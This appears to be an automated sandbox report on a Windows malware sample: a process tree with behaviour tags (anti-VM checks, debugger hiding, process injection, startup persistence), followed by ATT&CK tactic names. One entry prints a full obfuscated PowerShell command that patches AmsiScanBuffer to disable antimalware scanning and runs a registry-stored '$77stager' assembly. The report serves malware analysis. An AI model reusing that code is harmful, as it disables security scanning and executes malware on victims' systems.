PID 572 wrote to memory of 1784	572	dllhost.exe	36
PID 572 wrote to memory of 2116	572	dllhost.exe	37
PID 572 wrote to memory of 2152	572	dllhost.exe	38
PID 572 wrote to memory of 2248	572	dllhost.exe	40
PID 572 wrote to memory of 2312	572	dllhost.exe	41
PID 572 wrote to memory of 2484	572	dllhost.exe	42
PID 572 wrote to memory of 2496	572	dllhost.exe	43
PID 572 wrote to memory of 2568	572	dllhost.exe	44
PID 572 wrote to memory of 2576	572	dllhost.exe	45
PID 572 wrote to memory of 2628	572	dllhost.exe	46
PID 572 wrote to memory of 2688	572	dllhost.exe	47
PID 572 wrote to memory of 2784	572	dllhost.exe	48
PID 572 wrote to memory of 2796	572	dllhost.exe	49
PID 572 wrote to memory of 2812	572	dllhost.exe	50
PID 572 wrote to memory of 2848	572	dllhost.exe	51
PID 572 wrote to memory of 2860	572	dllhost.exe	52
PID 572 wrote to memory of 2612	572	dllhost.exe	53

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3b283a64-0ea0-4e52-8c44-d450924c9d58}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:572

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1184
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2628
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2372
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:5020
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2616
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1700
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:208
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1208
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1504
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:3400
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2544
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4416
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:3944
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1172
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:knEhKFZhtiUd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PwwOfaRLPFPdHR,[Parameter(Position=1)][Type]$vtvcpXIUxq)$vuboJrvRyYN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+'l'+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+'du'+'l'+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',P'+[Char](117)+''+'b'+''+[Char](108)+'ic,S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+'o'+'C'+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$vuboJrvRyYN.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+'ec'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+'b'+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$PwwOfaRLPFPdHR).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$vuboJrvRyYN.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+'Sl'+'o'+'t'+[Char](44)+''+'V'+'i'+[Char](114)+'tu'+'a'+'l',$vtvcpXIUxq,$PwwOfaRLPFPdHR).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $vuboJrvRyYN.CreateType();}$HnJLFHAaTbnZf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+'t'+'.'+''+'W'+''+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'iv'+'e'+'M'+[Char](101)+''+'t'+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$vcGGfqzxoLEIiB=$HnJLFHAaTbnZf.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IiNFdNBXLnZGVbYcNwB=knEhKFZhtiUd @([String])([IntPtr]);$xiYyyTeGgADoZipeeujTty=knEhKFZhtiUd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dXKEOnRTTBK=$HnJLFHAaTbnZf.GetMethod('Get'+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$hJZSSoFEjmfMaL=$vcGGfqzxoLEIiB.Invoke($Null,@([Object]$dXKEOnRTTBK,[Object](''+'L'+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'ry'+[Char](65)+'')));$BhgNSnzQxKHRBVVaO=$vcGGfqzxoLEIiB.Invoke($Null,@([Object]$dXKEOnRTTBK,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$dxMHJmD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hJZSSoFEjmfMaL,$IiNFdNBXLnZGVbYcNwB).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$pKUHtOqeWHKwJcPju=$vcGGfqzxoLEIiB.Invoke($Null,@([Object]$dxMHJmD,[Object](''+'A'+'ms'+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SBKDBzeLVt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BhgNSnzQxKHRBVVaO,$xiYyyTeGgADoZipeeujTty).Invoke($pKUHtOqeWHKwJcPju,[uint32]8,4,[ref]$SBKDBzeLVt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pKUHtOqeWHKwJcPju,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BhgNSnzQxKHRBVVaO,$xiYyyTeGgADoZipeeujTty).Invoke($pKUHtOqeWHKwJcPju,[uint32]8,0x20,[ref]$SBKDBzeLVt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1376
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3312
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5004
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1180
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3068
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4600
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3940
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1432
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2116

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2796

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2860

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3304

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3412
- C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
  "C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1504
- - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1160
    - - C:\Users\Admin\AppData\Local\Temp\$77f4daf3
        
        "C:\Users\Admin\AppData\Local\Temp\$77f4daf3"
        5⤵
        Executes dropped EXE
        
        PID:2540
    - - C:\Users\Admin\AppData\Local\Temp\$77db5b93
        
        "C:\Users\Admin\AppData\Local\Temp\$77db5b93"
        5⤵
        Executes dropped EXE
        
        PID:636
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 600
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3552

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2404

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1424

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1448

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:5040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1744

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1696
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 636 -ip 636
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion